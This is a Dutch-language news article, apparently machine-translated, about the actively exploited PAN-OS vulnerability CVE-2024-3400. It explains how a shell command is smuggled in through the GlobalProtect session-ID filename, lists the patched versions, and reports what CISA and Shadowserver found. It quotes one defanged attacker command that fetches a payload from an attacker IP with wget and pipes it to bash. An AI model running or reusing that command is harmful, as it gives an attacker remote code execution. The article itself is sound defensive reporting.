Palo Alto Networks maakt meer details bekend over kritieke PAN-OS-fouten die worden aangevallen

Palo Alto Networks heeft meer details gedeeld over een kritieke beveiligingsfout die invloed heeft op PAN-OS en die in het wild actief wordt uitgebuit door kwaadwillende actoren.

Het bedrijf beschreef de kwetsbaarheid en werd bijgehouden als CVE-2024-3400 (CVSS-score: 10.0), als “ingewikkeld” en een combinatie van twee bugs in versies PAN-OS 10.2, PAN-OS 11.0 en PAN-OS 11.1 van de software.

“In de eerste gevalideerde de GlobalProtect-service het sessie-ID-formaat niet voldoende voordat deze werd opgeslagen. Hierdoor kon de aanvaller een leeg bestand opslaan met de door de aanvaller gekozen bestandsnaam”, zegt Chandan BN, senior director product security bij Palo Alto Networks, gezegd.

“De tweede bug (het vertrouwen dat de bestanden door het systeem werden gegenereerd) gebruikte de bestandsnamen als onderdeel van een opdracht.”

Het is de moeite waard om op te merken dat, hoewel geen van de problemen op zichzelf kritisch genoeg zijn, ze, als ze aan elkaar gekoppeld worden, kunnen leiden tot niet-geverifieerde uitvoering van shell-opdrachten op afstand.

Palo Alto Networks zei dat de dreigingsactor achter de zero-day-exploitatie van de fout, UTA0218, een aanval in twee fasen uitvoerde om opdrachtuitvoering op gevoelige apparaten te bewerkstelligen. De activiteit wordt gevolgd onder de naam Operation MidnightEclipse.

Zoals eerder onthuld door zowel Volexity als de eigen Unit 42-dreigingsinformatieafdeling van het netwerkbeveiligingsbedrijf, gaat het hierbij om het verzenden van speciaal vervaardigde verzoeken met daarin de uit te voeren opdracht, die vervolgens wordt uitgevoerd via een achterdeur genaamd UPSTYLE.

“Het aanvankelijke persistentiemechanisme dat door UTA0218 werd opgezet, omvatte het configureren van een cron-job die wget zou gebruiken om een ​​payload op te halen van een door de aanvaller gecontroleerde URL, waarbij de uitvoer naar stdout werd geschreven en naar bash werd geleid voor uitvoering”, merkte Volexity vorige week op.

Cyberbeveiliging

“De aanvaller gebruikte deze methode om specifieke opdrachten te implementeren en uit te voeren en reverse proxy-tools zoals GOST (GO Simple Tunnel) te downloaden.”

Eenheid 42 zei dat het niet in staat was om de commando's te bepalen die via dit mechanisme werden uitgevoerd – wget -qO-hxxp://172.233.228[.]93/beleid | bash – maar oordeelde dat het op cron-jobs gebaseerde implantaat waarschijnlijk wordt gebruikt om post-exploitatieactiviteiten uit te voeren.

“In fase 1 stuurt de aanvaller een zorgvuldig vervaardigd shell-commando in plaats van een geldig sessie-ID naar GlobalProtect”, legt Chandan uit. “Dit resulteert in het creëren van een leeg bestand op het systeem met een ingebed commando als bestandsnaam, zoals gekozen door de aanvaller.”

“In fase 2 gebruikt een nietsvermoedende geplande systeemtaak die regelmatig wordt uitgevoerd de door de aanvaller opgegeven bestandsnaam in een opdracht. Dit resulteert in de uitvoering van de door de aanvaller verstrekte opdracht met verhoogde rechten.”

Hoewel Palo Alto Networks aanvankelijk opmerkte dat voor een succesvolle exploitatie van CVE-2024-3400 de firewallconfiguraties voor de GlobalProtect-gateway of het GlobalProtect-portaal (of beide) en apparaattelemetrie ingeschakeld waren, heeft het bedrijf sindsdien bevestigd dat apparaattelemetrie geen invloed heeft op het probleem.

Dit is gebaseerd op nieuwe bevindingen van bisschop Fox, die bypasses ontdekte om de fout zodanig te bewapenen dat er geen telemetrie op een apparaat nodig was om het te infiltreren.

Het bedrijf heeft de afgelopen dagen ook de patches voor de fout uitgebreid om andere veelgebruikte onderhoudsreleases te dekken:

  • PAN-OS 10.2.9-h1
  • PAN-OS 10.2.8-h3
  • PAN-OS 10.2.7-h8
  • PAN-OS 10.2.6-h3
  • PAN-OS 10.2.5-h6
  • PAN-OS 10.2.4-h16
  • PAN-OS 10.2.3-h13
  • PAN-OS 10.2.2-h5
  • PAN-OS 10.2.1-h2
  • PAN-OS 10.2.0-h3
  • PAN-OS 11.0.4-h1
  • PAN-OS 11.0.4-h2
  • PAN-OS 11.0.3-h10
  • PAN-OS 11.0.2-h4
  • PAN-OS 11.0.1-h4
  • PAN-OS 11.0.0-h3
  • PAN-OS 11.1.2-h3
  • PAN-OS 11.1.1-h1
  • PAN-OS 11.1.0-h3

In het licht van het actieve misbruik van CVE-2024-3400 en de beschikbaarheid van een proof-of-concept (PoC) exploitcode, wordt gebruikers aangeraden stappen te ondernemen om de hotfixes zo snel mogelijk toe te passen ter bescherming tegen potentiële bedreigingen.

Cyberbeveiliging

De Amerikaanse Cybersecurity and Infrastructure Security Agency (CISA) heeft de tekortkoming ook toegevoegd aan zijn Known Exploited Vulnerabilities (KEV)-catalogus en heeft federale instanties opdracht gegeven hun apparaten vóór 19 april 2024 te beveiligen.

Volgens informatie gedeeld door de Shadowserver Foundation zijn ongeveer 22.542 op internet blootgestelde firewallapparaten waarschijnlijk kwetsbaar voor de CVE-2024-3400. Het merendeel van de apparaten bevindt zich vanaf 18 april 2024 in de VS, Japan, India, Duitsland, het VK, Canada, Australië, Frankrijk en China.

Thijs Van der Does